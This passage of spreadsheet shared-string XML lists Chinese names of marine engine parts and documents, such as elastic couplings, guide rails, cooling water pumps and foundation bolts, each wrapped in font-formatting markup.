        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧套明细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧止动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性安装的数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性齿轮安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性挡圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性基础，主机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性离合器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性联轴器，低温冷却</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性联轴器，高温冷却</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性联轴器，空气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性联轴器，燃油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性联轴器，润滑油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性联轴器，重油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性联轴器中枢</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性锁紧螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性楔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性支座说明书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>氮化处理说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>氮气加压泵质量规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>氮气接管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡板盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡圈</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>档板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导板梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导板液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导板装置安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导叉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导阀装配板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导轨</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导轨布置</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导轨和平台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导轨支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导套，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导套，油缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向钢丝</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴颈轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向筒</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向轴承安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向轴承轴瓦清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向轴瓦</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向轴瓦</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导靴</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导叶螺丝</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>德语说明板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯式按钮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯罩，黄色</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯罩，蓝色</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等径</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等径弯头固定接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低负荷控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低负荷运转</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低固有频率主机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低流量报警</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低硫燃油指南</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低温阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低温管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低温开关用冷却水温度计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低温冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低温冷却水备用泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低温冷却水泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低温冷却系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>SCR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压报警</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压燃油布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压液压油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低液位报警</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底板上的套圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底板右侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底板左侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底部带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底部弹簧套毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底部防护装置总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底部销连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底部压紧板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底架焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底脚螺栓</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底脚总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座部分焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座部分机加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座圈</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地板及盖板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地板支座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端部垫块螺栓规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
